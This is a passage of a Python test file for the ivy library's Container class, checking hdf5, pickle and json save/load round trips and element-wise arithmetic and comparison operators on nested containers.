assert np.array_equal(ivy.to_numpy(containerx["a"]), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(containerx.a), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(containerx["b"]["c"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containerx.b.c), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containerx["b"]["d"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containerx.b.d), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery["a"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containery.a), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containery["b"]["c"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery.b.c), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery["b"]["d"]), np.array([3.0]))
assert np.array_equal(ivy.to_numpy(containery.b.d), np.array([3.0]))
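# hdf5 round trip: save one batch, append a second batch at starting_index=1,
# then reload the full file, reload a slice, and query the file and batch size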
def test_container_to_and_from_disk_as_hdf5(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.hdf5"
dict_in_1 = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
container1 = Container(dict_in_1)
dict_in_2 = {
"a": ivy.array([np.float32(1.0), np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0), np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0), np.float32(3.0)], device=device),
},
}
container2 = Container(dict_in_2)
# saving
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_hdf5(save_filepath, slice(1))
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container1.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container1.b.d)
)
# appending
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2, starting_index=1)
assert os.path.exists(save_filepath)
# loading after append
loaded_container = Container.from_disk_as_hdf5(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container2.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container2.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container2.b.d)
)
# load slice
loaded_sliced_container = Container.from_disk_as_hdf5(save_filepath, slice(1, 2))
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.a), ivy.to_numpy(container1.a)
)
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.b.c), ivy.to_numpy(container1.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.b.d), ivy.to_numpy(container1.b.d)
)
# file size
file_size, batch_size = Container.h5_file_size(save_filepath)
assert file_size == 6 * np.dtype(np.float32).itemsize
assert batch_size == 2
os.remove(save_filepath)
def test_container_to_disk_shuffle_and_from_disk_as_hdf5(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.hdf5"
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": {
"c": ivy.array([1, 2, 3], device=device),
"d": ivy.array([1, 2, 3], device=device),
},
}
container = Container(dict_in)
# saving
container.to_disk_as_hdf5(save_filepath, max_batch_size=3)
assert os.path.exists(save_filepath)
# shuffling
Container.shuffle_h5_file(save_filepath)
# loading
container_shuffled = Container.from_disk_as_hdf5(save_filepath, slice(3))
# testing
data = np.array([1, 2, 3])
random.seed(0)
random.shuffle(data)
assert (ivy.to_numpy(container_shuffled["a"]) == data).all()
assert (ivy.to_numpy(container_shuffled.a) == data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == data).all()
os.remove(save_filepath)
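# pickling should preserve the container structure, its config, and whether a
# local ivy module (ivyh) was bound at construction time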
def test_container_pickle(device, call):
if call in [helpers.tf_graph_call]:
        # container pickling requires eager execution
pytest.skip()
dict_in = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
# without module attribute
cont = Container(dict_in)
assert cont._local_ivy is None
pickled = pickle.dumps(cont)
cont_again = pickle.loads(pickled)
assert cont_again._local_ivy is None
    assert ivy.Container.identical_structure([cont, cont_again])
    assert ivy.Container.identical_configs([cont, cont_again])
# with module attribute
cont = Container(dict_in, ivyh=ivy)
assert cont._local_ivy is ivy
pickled = pickle.dumps(cont)
cont_again = pickle.loads(pickled)
# noinspection PyUnresolvedReferences
    assert (
        cont_again._local_ivy.current_framework_str()
        == ivy.current_framework_str()
    )
    assert ivy.Container.identical_structure([cont, cont_again])
    assert ivy.Container.identical_configs([cont, cont_again])
def test_container_to_and_from_disk_as_pickled(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.pickled"
dict_in = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
container = Container(dict_in)
# saving
container.to_disk_as_pickled(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_pickled(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container.b.d)
)
os.remove(save_filepath)
def test_container_to_and_from_disk_as_json(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.json"
dict_in = {
"a": 1.274e-7,
"b": {"c": True, "d": ivy.array([np.float32(3.0)], device=device)},
}
container = Container(dict_in)
# saving
container.to_disk_as_json(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_json(save_filepath)
assert np.array_equal(loaded_container.a, container.a)
assert np.array_equal(loaded_container.b.c, container.b.c)
assert isinstance(loaded_container.b.d, str)
os.remove(save_filepath)
def test_container_positive(device, call):
container = +Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_negative(device, call):
container = -Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([-1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([-3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-3]))
def test_container_pow(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a**container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([16]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([16]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([729]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([729]))
def test_container_scalar_pow(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container_a**2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_reverse_scalar_pow(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2**container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([8]))
def test_container_scalar_addition(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container += 3
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_reverse_scalar_addition(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 3 + container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_addition(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a + container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_subtraction(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container -= 1
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_subtraction(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 1 - container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-1]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-2]))
def test_container_subtraction(device, call):
container_a = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([1], device=device),
"d": ivy.array([4], device=device),
},
}
)
container = container_a - container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_scalar_multiplication(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
)
container *= 2.5
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_reverse_scalar_multiplication(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
)
container = 2.5 * container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_multiplication(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a * container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([8]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([18]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([18]))
def test_container_scalar_truediv(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container /= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2.5]))
def test_container_reverse_scalar_truediv(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container = 2 / container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0.4]))
def test_container_truediv(device, call):
container_a = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([4.0], device=device),
},
}
)
container = container_a / container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([1.25]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1.25]))
def test_container_scalar_floordiv(device, call):
if call is helpers.mx_call:
        # MXNet arrays do not overload the // operator; support can be added
        # once an explicit ivy.floordiv is implemented
pytest.skip()
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container //= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_floordiv(device, call):
if call is helpers.mx_call:
        # MXNet arrays do not overload the // operator; support can be added
        # once an explicit ivy.floordiv is implemented
pytest.skip()
container = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([1], device=device),
"d": ivy.array([7], device=device),
},
}
)
container = 5 // container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0]))
def test_container_floordiv(device, call):
if call is helpers.mx_call:
        # MXNet arrays do not overload the // operator; support can be added
        # once an explicit ivy.floordiv is implemented
pytest.skip()
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([4], device=device),
},
}
)
container = container_a // container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1]))
def test_container_abs(device, call):
container = abs(
Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_scalar_less_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container < 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 < container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a < container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_less_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container <= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 <= container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than_or_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a <= container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container == 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 == container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a == container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_not_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container != 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_not_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 != container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_not_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a != container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container > 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 > container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a > container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container >= 2
